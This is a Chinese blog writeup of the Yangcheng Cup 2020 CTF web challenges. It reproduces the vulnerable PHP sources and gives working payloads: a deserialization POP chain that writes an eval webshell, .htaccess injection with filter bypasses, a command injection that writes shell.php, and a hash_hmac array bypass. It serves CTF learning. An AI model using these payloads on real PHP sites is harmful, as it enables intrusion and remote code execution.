文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox-Retired

HackTheBox-Active

VulnHub

代码审计

PHP代码审计

大数据安全

机器学习

基础学习

Python

Python基础

Python安全

Java

Java基础

Java安全

算法

Leetcode

随笔

经验

技术

 2020-12-10   1.4k

羊城杯2020 Web Writeup

当时没时间打,现在题目在GitHub上开源了,随便看看。

easycon

蚁剑连接一句话,下载bbbbbbbbb.txt文件,是一个少了头部分的base64编码的图片,加上头再转码

easyser

这题目说实在的,提示地太隐晦了,用不安全的协议读取ser.php文件,Fuzz半天发现是用http://127.0.0.1/star1.php读取源码。

ser.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';

class GWHT{
public $hero;
public function __construct(){
$this->hero = new Yasuo;
}
public function __toString(){
if (isset($this->hero)){
return $this->hero->hasaki();
}else{
return "You don't look very happy";
}
}
}
class Yongen{ //flag.php
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = $file;
$this -> text = $text;

}
public function hasaki(){
$d = '<?php die("nononon");?>';
$a= $d. $this->text;
@file_put_contents($this-> file,$a);
}
}
class Yasuo{
public function hasaki(){
return "I'm the best happy windy man";
}
}
/*$c=$_GET['c'];
echo $x=unserialize($c);*/

POP链构造+绕过exit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
class GWHT{
public $hero;
}

class Yongen{ //flag.php

public $file = "php://filter/convert.base64-decode/resource=aaa.php";
public $text = "aaaPD9waHAgZXZhbCgkX1BPU1Rbc10pOyAgPz4=";
}

$a = new GWHT;
$a->hero = new Yongen;
echo urlencode(serialize($a));

easyphp

代码审计

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
file_put_contents($filename, $content . "\nHello, world");
?>

第一反应就是覆盖掉index.php,但是好像没有写入权限,那大概率应该就是用.htaccess这个文件做文章了。

第一种思路,向.htaccess文件写入shell,并且用auto_prepend_file包含.htaccess,但是file关键字被ban了,可以用换行绕过,结尾要用\处理content中的\n

1
?filename=.htaccess&content=php_value%20auto_prepend_fil\%0ae%20.htaccess%0a%23<? php%20system('cat%20/fl[a]g');?>\

第二种思路,依然是利用.htaccess文件特性,不过这次是通过设置php_value来设置preg_macth正则回溯次数

1
2
php_value pcre.backtrack_limit 0
php_value pcre.jit 0

先写入.htaccess

1
?content=php_value%20pcre.backtrack_limit%200%0aphp_value%20pcre.jit%200%0a%23\&f ilename=.htaccess

再直接通过php://filter伪协议写入一句话:

1
?filename=php://filter/write=convert.base64-decode/resource=.htaccess&content=cGhwX3ZhbHVlIHBjcmUuYmFja3RyYWNrX2xpbWl0IDAKcG hwX3ZhbHVlIHBjcmUuaml0IDAKcGhwX3ZhbHVlIGF1dG9fYXBwZW5kX2ZpbGUgLmh0YWNjZXNzCiM8P3 BocCBldmFsKCRfR0VUWzFdKTs/Plw&1=phpinfo();

easyphp2

robots.txt提示有check.php

伪协议读取源码:

https://www.php.net/manual/zh/filters.convert.php

1
http://localhost:8080/?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php

GWHT.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>count is here</title>

<style>

html,
body {
overflow: none;
max-height: 100vh;
}

</style>
</head>

<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">

<center><img src="question.jpg" height="200" width="200" /> </center>

<?php
ini_set('max_execution_time', 5);

if ($_COOKIE['pass'] !== getenv('PASS')) {
setcookie('pass', 'PASS');
die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
}
?>

<h1>A Counter is here, but it has someting wrong</h1>

<form>
<input type="hidden" value="GWHT.php" name="file">
<textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
<input type="submit">
</form>

<?php
if (isset($_GET["count"])) {
$count = $_GET["count"];
if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
die('hacker!');
}
echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
}
?>

</body>

</html>

check.php

1
2
3
4
5
6
<?php
$pass = "GWHT";
// Cookie password.
echo "Here is nothing, isn't it ?";

header('Location: /');

读到Cookie是GWHT,接下来就是命令执行exec('printf \'' . $count . '\' | wc -c')

exec命令无回显,可以直接写入shell

1
1'| echo "<?=eval(\$_POST['shell'])?>" > shell.php ||'

另外base64还有一种绕过方式:%6%32%32是2,拼接成%62就是字母b了。

BlackCat

首页提示你听歌,把MP3下载到本地,用010 Editor打开,文件末尾隐藏着PHP代码

copy下来放到sublime中审计:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
die('Ë­£¡¾¹¸Ò²ÈÎÒÒ»Ö»¶úµÄβ°Í£¡');
}

$clandestine = getenv("clandestine");

if(isset($_POST['White-cat-monitor']))
$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);


$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);

if($hh !== $_POST['Black-Cat-Sheriff']){
die('ÓÐÒâÃé×¼£¬ÎÞÒâ»÷·¢£¬ÄãµÄÃÎÏë¾ÍÊÇÄãÒªÃé×¼µÄÄ¿±ê¡£ÏàÐÅ×Ô¼º£¬Äã¾ÍÊÇÄÇ¿ÅÉäÖаÐÐĵÄ×Óµ¯¡£');
}

echo exec("nc".$_POST['One-ear']);

中文存在乱码,不过不影响审计过程。hash_mac在官方文档中的第一个Note提到了一个trick:

第二个参数如果是数组的话,那么这个函数会生成一个warning,并且返回NULL,那么相当于$clandetine参数可控。payload:

1
White-cat-monitor[]=1&One-ear=;cat flag.php&Black-CatSheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6
Copyright © ca01h 2019-2021 | 本站总访问量